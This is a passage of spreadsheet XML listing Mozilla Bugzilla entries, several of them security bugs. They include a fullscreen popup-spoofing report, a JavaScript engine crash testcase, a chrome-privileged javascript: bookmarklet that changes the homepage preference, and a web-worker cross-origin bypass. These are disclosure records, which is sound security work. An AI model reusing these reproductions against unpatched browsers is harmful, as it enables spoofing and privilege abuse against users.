      <c r="E231" t="n">
        <v>1</v>
      </c>
      <c r="F231" t="n">
        <v>1</v>
      </c>
      <c r="G231" t="n">
        <v>3</v>
      </c>
      <c r="H231" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I231" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J231" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K231" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L231" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M231" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N231" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O231" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P231" t="inlineStr">
        <is>
          <t>[parity Chrome and Edge][post-critsmash-triage][adv-main74+]</t>
        </is>
      </c>
      <c r="Q231" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R231" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S231" t="inlineStr">
        <is>
          <t>mozilla74</t>
        </is>
      </c>
      <c r="T231" t="n">
        <v>1</v>
      </c>
      <c r="U231" t="n">
        <v>0</v>
      </c>
      <c r="V231" t="n">
        <v>35</v>
      </c>
      <c r="W231" t="inlineStr">
        <is>
          <t>Created attachment 8945145
fullscreenpopuptest.html
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3315.3 Safari/537.36
Steps to reproduce:
Hello. I am Avi Drissman on the Chrome security team. While investigating a security issue in Chrome, I found that Firefox is also vulnerable. The issue is https://crbug.com/776418 . While I'm happy to allow any Firefox security people access to that bug, I will explain the issue entirely in this bug.
When you take a page in Chrome into fullscreen, a bubble is shown at the top of the screen, saying "hey, you're in fullscreen, tap the escape key to get out". Chrome considers this to be security UI. Firefox has a similar bubble, and I imagine you consider this bubble to be security UI as well.
Obscuring that bubble would be bad. Therefore, if a page tries to open a popup while it is fullscreen, Chrome drops fullscreen. Firefox has the same behavior, and I again imagine it is for the same reason.
However, suppose a page opens a popup while not in fullscreen. If the page is subsequently taken to fullscreen, and then the page uses window.focus() to focus the popup, the popup is shown on top of the fullscreened page, and it obscures the fullscreen security UI bubble.
I attach a sample HTML page that will allow you to reproduce this behavior.
The original Chrome bug report has a very elaborate reproduction that spoofs Chrome UI to induce the user to click on the original page. Please be assured that limits on user gestures will not help here.
The solution that Chrome will be taking will be to kick a page out of fullscreen if it attempts to do any focusing of popups. Edge already has this behavior, and so I recommend that Firefox adopt this behavior.
In addition, I'm proposing this behavior to be standardized; see https://github.com/whatwg/fullscreen/issues/116 .
Please feel free to contact me (avi@google.com/avi@chromium.org) with any questions you may have.</t>
        </is>
      </c>
      <c r="X231" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="232">
      <c r="A232" t="n">
        <v>1221157</v>
      </c>
      <c r="B232" t="inlineStr">
        <is>
          <t>2015-11-03 08:03:47 -0800</t>
        </is>
      </c>
      <c r="C232" t="inlineStr">
        <is>
          <t>Update hash for django-browserid now it has a wheel</t>
        </is>
      </c>
      <c r="D232" t="inlineStr">
        <is>
          <t>2015-11-03 08:11:11 -0800</t>
        </is>
      </c>
      <c r="E232" t="n">
        <v>1</v>
      </c>
      <c r="F232" t="n">
        <v>1</v>
      </c>
      <c r="G232" t="n">
        <v>7</v>
      </c>
      <c r="H232" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I232" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J232" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K232" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L232" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M232" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N232" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O232" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P232" t="inlineStr"/>
      <c r="Q232" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R232" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S232" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T232" t="n">
        <v>1</v>
      </c>
      <c r="U232" t="n">
        <v>0</v>
      </c>
      <c r="V232" t="n">
        <v>2</v>
      </c>
      <c r="W232" t="inlineStr">
        <is>
          <t>I asked them to add a wheel, which they've now done (21 hrs ago), so we need to add the wheel hash:
THE FOLLOWING PACKAGES DIDN'T MATCH THE HASHES SPECIFIED IN THE REQUIREMENTS
FILE. If you have updated the package versions, update the hashes. If not,
freak out, because someone has tampered with the packages.
    django-browserid: expected -jPrQhcqGbcVrbp6ZJcJEftdj9G2nPjaepXyvH8PMDs
                           got 56MxTtRt0kOTkYZwt6EVbkuvODGJ9kSz5hIbocv7wvk
https://github.com/mozilla/django-browserid/issues/293</t>
        </is>
      </c>
      <c r="X232" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="233">
      <c r="A233" t="n">
        <v>489954</v>
      </c>
      <c r="B233" t="inlineStr">
        <is>
          <t>2009-04-24 00:22:59 -0700</t>
        </is>
      </c>
      <c r="C233" t="inlineStr">
        <is>
          <t>Missing complete mars for localised 3.5b4</t>
        </is>
      </c>
      <c r="D233" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E233" t="n">
        <v>1</v>
      </c>
      <c r="F233" t="n">
        <v>1</v>
      </c>
      <c r="G233" t="n">
        <v>5</v>
      </c>
      <c r="H233" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I233" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J233" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K233" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L233" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M233" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N233" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O233" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P233" t="inlineStr"/>
      <c r="Q233" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R233" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S233" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T233" t="n">
        <v>1</v>
      </c>
      <c r="U233" t="n">
        <v>0</v>
      </c>
      <c r="V233" t="n">
        <v>6</v>
      </c>
      <c r="W233" t="inlineStr">
        <is>
          <t>We're uploading the archive (exe/dmg/tar.bz2) and xpi, but not the complete mar. This code snippet
 http://mxr.mozilla.org/mozilla1.9.1/source/browser/locales/Makefile.in#436
reveals the problem to be that we're not setting MOZ_MAKE_COMPLETE_MAR=1</t>
        </is>
      </c>
      <c r="X233" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="234">
      <c r="A234" t="n">
        <v>1034383</v>
      </c>
      <c r="B234" t="inlineStr">
        <is>
          <t>2014-07-03 17:35:39 -0700</t>
        </is>
      </c>
      <c r="C234" t="inlineStr">
        <is>
          <t>Assertion failure: hasScript(), at jsfun.h</t>
        </is>
      </c>
      <c r="D234" t="inlineStr">
        <is>
          <t>2016-06-04 16:02:10 -0700</t>
        </is>
      </c>
      <c r="E234" t="n">
        <v>1</v>
      </c>
      <c r="F234" t="n">
        <v>1</v>
      </c>
      <c r="G234" t="n">
        <v>3</v>
      </c>
      <c r="H234" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I234" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J234" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K234" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L234" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M234" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N234" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O234" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P234" t="inlineStr">
        <is>
          <t>[adv-main31+] fixed by bug 1013056</t>
        </is>
      </c>
      <c r="Q234" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R234" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S234" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T234" t="n">
        <v>1</v>
      </c>
      <c r="U234" t="n">
        <v>0</v>
      </c>
      <c r="V234" t="n">
        <v>6</v>
      </c>
      <c r="W234" t="inlineStr">
        <is>
          <t>Created attachment 8450684
stack
x = [];
Object.defineProperty(x, 8, {
    get: (function(j) {})
});
Object.defineProperty(this, "y", {
    get: function() {
        return x.filterPar(function() {});
    }
});
for (var a = 0; a &lt; 99; a++) {
    Array.prototype.shift.call(y);
}
asserts js debug shell on m-c changeset 613bc15ccf05 with --ion-eager --ion-offthread-compile=off at Assertion failure: hasScript(), at jsfun.h
My configure flags are:
CC="gcc-4.7 -mfloat-abi=softfp -B/usr/lib/gcc/arm-linux-gnueabi/4.7" CXX="g++-4.7 -mfloat-abi=softfp -B/usr/lib/gcc/arm-linux-gnueabi/4.7" AR=ar sh /home/fuzz5lin/trees/mozilla-central/js/src/configure --target=arm-linux-gnueabi --enable-debug --enable-optimize --enable-profiling --enable-gczeal --enable-debug-symbols --disable-tests --enable-more-deterministic --with-ccache --enable-threadsafe &lt;other NSPR options&gt;
This is intermittent and mutates its signatures (sometimes unreliably crashes), so it would be nice to have this fixed. I'll see if I can get a bisection, but no promises here.
Setting s-s and sec-high as a start. Shu-yu, would you be able to take a look?</t>
        </is>
      </c>
      <c r="X234" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="235">
      <c r="A235" t="n">
        <v>732233</v>
      </c>
      <c r="B235" t="inlineStr">
        <is>
          <t>2012-03-01 15:30:13 -0800</t>
        </is>
      </c>
      <c r="C235" t="inlineStr">
        <is>
          <t>We should not trust the driver to not overflow, in WebGL uniform array setters</t>
        </is>
      </c>
      <c r="D235" t="inlineStr">
        <is>
          <t>2012-07-20 18:22:30 -0700</t>
        </is>
      </c>
      <c r="E235" t="n">
        <v>1</v>
      </c>
      <c r="F235" t="n">
        <v>1</v>
      </c>
      <c r="G235" t="n">
        <v>3</v>
      </c>
      <c r="H235" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I235" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J235" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K235" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L235" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M235" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N235" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O235" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P235" t="inlineStr">
        <is>
          <t>[sg:vector-critical (drivers)][advisory-tracking+][qa-] webgl-conformance webgl-next</t>
        </is>
      </c>
      <c r="Q235" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R235" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S235" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T235" t="n">
        <v>1</v>
      </c>
      <c r="U235" t="n">
        <v>0</v>
      </c>
      <c r="V235" t="n">
        <v>39</v>
      </c>
      <c r="W235" t="inlineStr">
        <is>
          <t>Currently, in the implementation of uniform array setters, we are happily passing too-long array sizes to glUniformXXv and relying the the specified behavior that anything that falls outside array boundaries gets silently ignored.
So a call like this,
  gl.uniform4fv(uniV4, [1, 2, 3, 4, 5, 6, 7, 8]);
results in a GL call like this,
  glUniform4fv(location, 2, ptr);
and we are not checking that the uniform array is really of size &gt;= 2. We are relying on the GL to check that.
Instead, we should clamp these sizes ourselves. That requires knowing what the real array sizes are. ANGLE gives us that, and we're already querying that : ShGetActiveUniform in CompileShader. We just need to store these values somewhere and use them.</t>
        </is>
      </c>
      <c r="X235" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="236">
      <c r="A236" t="n">
        <v>265668</v>
      </c>
      <c r="B236" t="inlineStr">
        <is>
          <t>2004-10-22 12:33:00 -0700</t>
        </is>
      </c>
      <c r="C236" t="inlineStr">
        <is>
          <t>Live bookmarks can have javascript: and data: URLs</t>
        </is>
      </c>
      <c r="D236" t="inlineStr">
        <is>
          <t>2006-08-27 07:26:48 -0700</t>
        </is>
      </c>
      <c r="E236" t="n">
        <v>1</v>
      </c>
      <c r="F236" t="n">
        <v>1</v>
      </c>
      <c r="G236" t="n">
        <v>2</v>
      </c>
      <c r="H236" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I236" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J236" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K236" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L236" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M236" t="inlineStr">
        <is>
          <t>Windows ME</t>
        </is>
      </c>
      <c r="N236" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O236" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P236" t="inlineStr">
        <is>
          <t>[sg:fix] security</t>
        </is>
      </c>
      <c r="Q236" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R236" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S236" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T236" t="n">
        <v>1</v>
      </c>
      <c r="U236" t="n">
        <v>0</v>
      </c>
      <c r="V236" t="n">
        <v>18</v>
      </c>
      <c r="W236" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Win 9x 4.90; rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows; U; Win 9x 4.90; rv:1.7.3) Gecko/20041001 Firefox/0.10.1
This requires that
the current url is
chrome.
Say for example
chrome://browser/content/bookmarks/bookmarksManager.xul.
And the user clicks the bookmarklet in this
context.
&lt;a href="javascript: var m_prefs =
Components.classes[&amp;quot;@mozilla.org/preferences-service;1&amp;quot;].getService(Components.interfaces.nsIPrefBranch);
m_prefs.setCharPref(&amp;quot;browser.startup.homepage&amp;quot;,&amp;quot;http://visuallinkindicator.mozdev.org/&amp;quot;);"&gt;Link&lt;/a&gt;
- change home page
Can be a problem with livemarks.
Reproducible: Always
Steps to Reproduce:
1. Bookmark link
2. Enter chrome://browser/content/bookmarks/bookmarksManager.xul
3. Click bookmark link
Actual Results:  
Home page changed or javascript with chrome
privilege executed.
Expected Results:  
Eventhough it is a nice feature,
I think it should deny.</t>
        </is>
      </c>
      <c r="X236" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="237">
      <c r="A237" t="n">
        <v>576649</v>
      </c>
      <c r="B237" t="inlineStr">
        <is>
          <t>2010-07-02 15:09:00 -0700</t>
        </is>
      </c>
      <c r="C237" t="inlineStr">
        <is>
          <t>"ASSERTION: Invalid offset" and more with -moz-column, abs pos, huge letter-spacing</t>
        </is>
      </c>
      <c r="D237" t="inlineStr">
        <is>
          <t>2011-06-20 18:09:17 -0700</t>
        </is>
      </c>
      <c r="E237" t="n">
        <v>1</v>
      </c>
      <c r="F237" t="n">
        <v>1</v>
      </c>
      <c r="G237" t="n">
        <v>3</v>
      </c>
      <c r="H237" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I237" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J237" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K237" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L237" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M237" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N237" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O237" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P237" t="inlineStr">
        <is>
          <t>[sg:critical?][critsmash:patch]</t>
        </is>
      </c>
      <c r="Q237" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R237" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S237" t="inlineStr">
        <is>
          <t>mozilla2.0b4</t>
        </is>
      </c>
      <c r="T237" t="n">
        <v>1</v>
      </c>
      <c r="U237" t="n">
        <v>0</v>
      </c>
      <c r="V237" t="n">
        <v>38</v>
      </c>
      <c r="W237" t="inlineStr">
        <is>
          <t>Created attachment 455778
testcase
###!!! ASSERTION: Invalid offset: 'aOffset &lt;= mSkipChars-&gt;mCharCount', file /builds/slave/mozilla-central-macosx-debug/build/gfx/thebes/gfxSkipChars.cpp, line 92
###!!! ASSERTION: Text run does not map enough text for our reflow: 'gfxSkipCharsIterator(iter).ConvertOriginalToSkipped(offset + length) &lt;= mTextRun-&gt;GetLength()', file /builds/slave/mozilla-central-macosx-debug/build/layout/generic/nsTextFrameThebes.cpp, line 6278</t>
        </is>
      </c>
      <c r="X237" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="238">
      <c r="A238" t="n">
        <v>12475</v>
      </c>
      <c r="B238" t="inlineStr">
        <is>
          <t>1999-08-25 14:08:40 -0700</t>
        </is>
      </c>
      <c r="C238" t="inlineStr">
        <is>
          <t>[Blocker] Wallet resetting form values.</t>
        </is>
      </c>
      <c r="D238" t="inlineStr">
        <is>
          <t>1999-09-07 13:44:51 -0700</t>
        </is>
      </c>
      <c r="E238" t="n">
        <v>1</v>
      </c>
      <c r="F238" t="n">
        <v>1</v>
      </c>
      <c r="G238" t="n">
        <v>3</v>
      </c>
      <c r="H238" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I238" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J238" t="inlineStr">
        <is>
          <t>Layout: Form Controls</t>
        </is>
      </c>
      <c r="K238" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L238" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M238" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N238" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O238" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P238" t="inlineStr">
        <is>
          <t>possible fix</t>
        </is>
      </c>
      <c r="Q238" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R238" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S238" t="inlineStr">
        <is>
          <t>M10</t>
        </is>
      </c>
      <c r="T238" t="n">
        <v>1</v>
      </c>
      <c r="U238" t="n">
        <v>0</v>
      </c>
      <c r="V238" t="n">
        <v>20</v>
      </c>
      <c r="W238" t="inlineStr">
        <is>
          <t>For M9: TextBox as well as Select object does not hold the values assigned to
them through HTML code.
For M10: Select Object does not hold value assigned to it through HTML code.
BULDS:
M9: 08-24-13 [Apprunner]
M10: 08-24-09 [Apprunner]
STEPS TO REPRODUCE:
1] Visit URL above with both the builds [M9 as well as M10].
2] You'll see one Text Box, [Please do not input anything in the text box.]
3] You'll see one select. Please select one option from this select.
4] Click Submit button.
OR
1] Please copy "HTML" code as well as "cgi" code I'm providing belove.
2] Save these two files.
3] Make necessary changes in FORM ACTION in HTML file, according to your cgi
file location and name.
4] Open HTML file with both the builds [M9 as well as M10].
5] You'll see one Text Box, [Please do not input anything in the text box.]
6] You'll see one select. Please select one option from this select.
7] Click Submit button.
EXPECTED RESULTS:
When you open HTML file, TextBox should show value "TextValue" since its
assigned to TextBox in HTML code itself.
After Clicking Submit Button you should see
Text Box Value is: TextValue
Select Value is: SelectValue1 [Considering first option is selected]
ACTUAL RESULTS:
M9:
on opening HTML page, TextBox does not show any value. [This means its not
holding value assigned to it through HTML code.]
After Clicking Submit Button,
Text Box Value is:
Select Value is:
[This means, TextBox as well as Select are not holding their values]
M10:
on opening HTML page, TextBox does show its value. [This is different than M9
results]
After Clicking Submit Button,
Text Box Value is: TextValue
Select Value is:
[This means, TextBox does hold its value, but select does not hold its value.]
HTML CODE:
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;VALTEST&lt;/title&gt;
&lt;/head&gt;
&lt;script&gt;
&lt;!--
function SubForm(){
document.workform.submit();
}
//--&gt;
&lt;/script&gt;
&lt;body bgcolor="#FFFFFF" text="#000000" &gt;
&lt;form name="workform" action="/ngdriver/cgi-bin/foo1.cgi" method="post"&gt;
Text Box&lt;input type="text" name="temptext" value="TextValue" size="40"&gt;&lt;br&gt;
Select Something Here&lt;select name="tempsel" multiple&gt;
&lt;option value="SelectValue1"&gt;Option1&lt;/option&gt;
&lt;option value="SelectValue2"&gt;Option2&lt;/option&gt;
&lt;option value="SelectValue3"&gt;Option3&lt;/option&gt;
&lt;/select&gt;&lt;br&gt;
&lt;input type=button name="button2" value="Submit" onclick="SubForm();"&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
END OF HTML CODE:
CGI CODE:
#!/usr/local/bin/perl
require "cgi-lib.pl";
print "Content-type: text/html", "\n\n";
MAIN:
{
&amp;ReadParse(*input);
$resultsdir = "results";
$textval = $input{'temptext'};
$selval = $input{'tempsel'};
print "&lt;HTML&gt;\n";
print "&lt;HEAD&gt;\n";
print "&lt;TITLE&gt;CGI Test&lt;/TITLE&gt;\n";
print "&lt;/HEAD&gt;\n";
print "&lt;BODY&gt;\n";
print "&lt;H2&gt;Text Box Value is:    $textval&lt;/H2&gt;&lt;br&gt;\n";
print "&lt;H2&gt;Select Value is:    $selval&lt;/H2&gt;&lt;br&gt;\n";
print "&lt;/BODY&gt;\n";
print "&lt;/HTML&gt;\n";
}
exit(0);
END OF CGI CODE:
Other object like "hidden", "Checkbox", "Radio", does not have any problem.
Viewer works fine.
Tested on Win-95, WinNT, Mac, Linux.</t>
        </is>
      </c>
      <c r="X238" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="239">
      <c r="A239" t="n">
        <v>39676</v>
      </c>
      <c r="B239" t="inlineStr">
        <is>
          <t>2000-05-17 16:36:06 -0700</t>
        </is>
      </c>
      <c r="C239" t="inlineStr">
        <is>
          <t>Mac install wizard does not proceed after target folder selected</t>
        </is>
      </c>
      <c r="D239" t="inlineStr">
        <is>
          <t>2005-01-07 00:39:11 -0800</t>
        </is>
      </c>
      <c r="E239" t="n">
        <v>1</v>
      </c>
      <c r="F239" t="n">
        <v>1</v>
      </c>
      <c r="G239" t="n">
        <v>2</v>
      </c>
      <c r="H239" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I239" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J239" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K239" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L239" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M239" t="inlineStr">
        <is>
          <t>Mac System 9.x</t>
        </is>
      </c>
      <c r="N239" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O239" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P239" t="inlineStr"/>
      <c r="Q239" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R239" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S239" t="inlineStr">
        <is>
          <t>M16</t>
        </is>
      </c>
      <c r="T239" t="n">
        <v>1</v>
      </c>
      <c r="U239" t="n">
        <v>0</v>
      </c>
      <c r="V239" t="n">
        <v>5</v>
      </c>
      <c r="W239" t="inlineStr">
        <is>
          <t>Build: 2000-05-17-14-M16(MAC)
1. Start the installer
2. Click Accept button to agree to License Agreement
3. Click Continue button to agree to 'proceed with this installation'
4. Click Select Location button and choose one
5. Click Continue button
RESULT:
Nothing happens.
EXPECTED RESULT:
Next screen of wizard appears.</t>
        </is>
      </c>
      <c r="X239" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="240">
      <c r="A240" t="n">
        <v>879787</v>
      </c>
      <c r="B240" t="inlineStr">
        <is>
          <t>2013-06-05 07:56:02 -0700</t>
        </is>
      </c>
      <c r="C240" t="inlineStr">
        <is>
          <t>Cross Domain Policy override using webworkers</t>
        </is>
      </c>
      <c r="D240" t="inlineStr">
        <is>
          <t>2024-05-30 08:03:52 -0700</t>
        </is>
      </c>
      <c r="E240" t="n">
        <v>1</v>
      </c>
      <c r="F240" t="n">
        <v>1</v>
      </c>
      <c r="G240" t="n">
        <v>3</v>
      </c>
      <c r="H240" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I240" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J240" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K240" t="inlineStr">
        <is>
          <t>18 Branch</t>
        </is>
      </c>
      <c r="L240" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M240" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N240" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O240" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P240" t="inlineStr">
        <is>
          <t>[adv-main23+]</t>
        </is>
      </c>
      <c r="Q240" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R240" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S240" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T240" t="n">
        <v>1</v>
      </c>
      <c r="U240" t="n">
        <v>0</v>
      </c>
      <c r="V240" t="n">
        <v>45</v>
      </c>
      <c r="W240" t="inlineStr">
        <is>
          <t>Created attachment 758588
sorry, i needed to zip all together
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 (Beta/Release)
Build ID: 20130206152201
Steps to reproduce:
I create a web worker in hostA, the webworker has instructions to send a XMLHttpRequest to hostB, also this request include custom headers.
I have try the same XMLHttpRequest using regular javascript and it wont work, the security check are in place that way, the problem is related to the webworkers
Actual results:
The request went thought, attached firefox images and burp proxy
Expected results:
This is not compliant with the same domain policy, also the ability to include custom headers could be a mayor problem as is a vector to attack CSRF protection based on headers.</t>
        </is>
      </c>
      <c r="X240" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="241">
      <c r="A241" t="n">
        <v>1310042</v>
      </c>
      <c r="B241" t="inlineStr">
        <is>
          <t>2016-10-13 15:31:33 -0700</t>
        </is>
      </c>
      <c r="C241" t="inlineStr">
        <is>
          <t>Implement send to Firefox/Safari</t>
        </is>
      </c>
      <c r="D241" t="inlineStr">
        <is>
          <t>2016-10-20 10:33:30 -0700</t>
        </is>
      </c>
      <c r="E241" t="n">
        <v>1</v>
      </c>
      <c r="F241" t="n">
        <v>1</v>
      </c>
      <c r="G241" t="n">
        <v>2</v>
      </c>
      <c r="H241" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I241" t="inlineStr">
        <is>
          <t>Focus-iOS</t>
        </is>
      </c>
      <c r="J241" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K241" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L241" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M241" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N241" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O241" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P241" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q241" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R241" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S241" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T241" t="n">
        <v>1</v>
      </c>
      <c r="U241" t="n">
        <v>0</v>
      </c>
      <c r="V241" t="n">
        <v>2</v>
      </c>
      <c r="W241" t="inlineStr">
        <is>
